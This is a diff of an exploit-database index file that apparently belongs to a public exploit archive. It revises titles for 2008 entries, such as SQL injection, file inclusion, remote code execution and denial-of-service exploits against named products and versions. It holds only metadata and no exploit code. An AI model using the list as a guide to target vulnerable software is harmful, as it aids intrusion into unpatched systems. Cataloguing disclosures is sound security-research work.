6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add-Admin",2008-09-21,"CWH Underground",php,webapps,0 -6514,platforms/php/webapps/6514.txt,"Availscript Jobs Portal Script - File Upload (Post-Authenticated)",2008-09-21,InjEctOr5,php,webapps,0 +6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Post-Authentication) File Upload",2008-09-21,InjEctOr5,php,webapps,0 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 -6517,platforms/php/webapps/6517.txt,"NetArtMedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 -6518,platforms/php/webapps/6518.txt,"NetArtMedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 +6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 +6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 -6522,platforms/php/webapps/6522.txt,"Availscript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 -6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 +6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0 6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 6527,platforms/php/webapps/6527.txt,"BuzzyWall 1.3.1 - (search.php search) SQL Injection",2008-09-22,~!Dok_tOR!~,php,webapps,0 6528,platforms/php/webapps/6528.txt,"WCMS 1.0b - (news_detail.asp id) SQL Injection",2008-09-22,"CWH Underground",php,webapps,0 -6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - (comments.php) Blind SQL Injection",2008-09-22,Stack,php,webapps,0 +6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,php,webapps,0 6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST - Remote Cross-Site Request Forgery Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 @@ -6116,11 +6117,11 @@ id,file,description,date,author,platform,type,port 6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injections",2008-09-23,StAkeR,php,webapps,0 6541,platforms/php/webapps/6541.txt,"Galmeta Post CMS 0.2 - Remote Code Execution / Arbitrary File Upload",2008-09-23,GoLd_M,php,webapps,0 6542,platforms/php/webapps/6542.txt,"JETIK-WEB Software - 'sayfa.php kat' SQL Injection",2008-09-23,d3v1l,php,webapps,0 -6543,platforms/php/webapps/6543.txt,"Ol Bookmarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0 +6543,platforms/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0 6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 -6545,platforms/php/webapps/6545.txt,"Hotscripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0 +6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin Exploit",2008-09-24,ka0x,php,webapps,0 -6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0 +6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6548,platforms/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps,0 @@ -6133,20 +6134,20 @@ id,file,description,date,author,platform,type,port 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 -6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - .doc File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0 +6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0 6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0 6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0 6566,platforms/php/webapps/6566.txt,"PHP infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0 -6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion Exploit",2008-09-25,Pepelux,php,webapps,0 +6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 6568,platforms/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps,0 6569,platforms/php/webapps/6569.txt,"Vikingboard 0.2 Beta - SQL Column Truncation",2008-09-25,StAkeR,php,webapps,0 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow Exploit (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 -6571,platforms/php/webapps/6571.txt,"openengine 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,php,webapps,0 +6571,platforms/php/webapps/6571.txt,"openEngine 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,php,webapps,0 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,php,webapps,0 -6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 +6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0 6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 @@ -6155,12 +6156,12 @@ id,file,description,date,author,platform,type,port 6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 -6582,platforms/hardware/dos/6582.pl,"Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 +6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 -6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 +6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 -6587,platforms/php/webapps/6587.txt,"The Gemini Portal - (lang) Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 +6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 @@ -6176,7 +6177,7 @@ id,file,description,date,author,platform,type,port 6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0 6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0 6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0 -6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - (path) Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 +6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0 @@ -6190,13 +6191,13 @@ id,file,description,date,author,platform,type,port 6615,platforms/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - '.zip' Denial of Service",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 -6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 +6618,platforms/php/webapps/6618.txt,"joomla Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) SQL Injection",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 -6624,platforms/php/webapps/6624.txt,"Arcadem Pro - (articlecat) SQL Injection",2008-09-29,"Hussin X",php,webapps,0 +6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0 6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0 @@ -6210,14 +6211,14 @@ id,file,description,date,author,platform,type,port 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6638,platforms/windows/remote/6638.html,"GdPicture Pro ActiveX - 'gdpicture4s.ocx' File Overwrite / Exec Exploit",2008-09-30,EgiX,windows,remote,0 -6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - (filename) Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 +6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0 -6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - (COOKIE) Local File Inclusion",2008-10-01,JosS,php,webapps,0 +6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0 6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0 6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 -6646,platforms/php/webapps/6646.php,"PHPScheduleIt 1.2.10 - (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 +6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0 6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - (esiadrv.sys) Exploit (PoC)",2008-10-01,"NT Internals",windows,dos,0 6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 @@ -6229,10 +6230,10 @@ id,file,description,date,author,platform,type,port 6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 -6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 +6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 -6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (stou con:1) Denial of Service (Post-Authenticated)",2008-10-03,dmnt,windows,dos,0 -6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Remote FTP File Replacement (Post-Authenticated)",2008-10-03,dmnt,windows,remote,0 +6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 +6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 @@ -6244,12 +6245,12 @@ id,file,description,date,author,platform,type,port 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 -6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 +6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary Upload / Information c99 Exploit",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 -6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - (COOKIE) Local File Inclusion",2008-10-05,JosS,php,webapps,0 +6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - (manual) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0 @@ -6257,16 +6258,16 @@ id,file,description,date,author,platform,type,port 6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - (raceid) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion",2008-10-06,NoGe,php,webapps,0 6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0 -6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 +6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote,0 6691,platforms/php/webapps/6691.txt,"yerba sacphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 6692,platforms/php/webapps/6692.txt,"Joomla Component com_hotspots - (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0 -6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 - (COOKIE) SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 +6693,platforms/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 -6697,platforms/php/webapps/6697.txt,"Built2Go PHP RealEstate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0 +6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC)",2008-10-08,Nine:Situations:Group,windows,remote,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 @@ -6275,20 +6276,20 @@ id,file,description,date,author,platform,type,port 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD",2008-10-08,GoLd_M,php,webapps,0 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0 -6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution Exploit (1)",2008-10-09,Sausage,php,webapps,0 +6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps,0 6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0 6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 -6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0 +6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0 -6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 +6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 -6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 +6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 -6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Authenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 +6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service",2008-10-10,rAWjAW,windows,dos,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host - 'faq.php faq' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 @@ -6312,7 +6313,7 @@ id,file,description,date,author,platform,type,port 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos,0 6742,platforms/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,windows,dos,0 6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution Exploit",2008-10-13,girex,php,webapps,0 -6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion Exploit",2008-10-13,JosS,php,webapps,0 +6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - SQL Injection",2008-10-14,g30rg3_x,php,webapps,0 @@ -6323,7 +6324,7 @@ id,file,description,date,author,platform,type,port 6752,platforms/windows/dos/6752.pl,"Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)",2008-10-14,LiquidWorm,windows,dos,0 6753,platforms/windows/dos/6753.py,"Titan FTP server 6.26 build 630 - Remote Denial of Service",2008-10-14,dmnt,windows,dos,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'success_story.php id' SQL Injection",2008-10-14,Hakxer,php,webapps,0 -6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0 +6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0 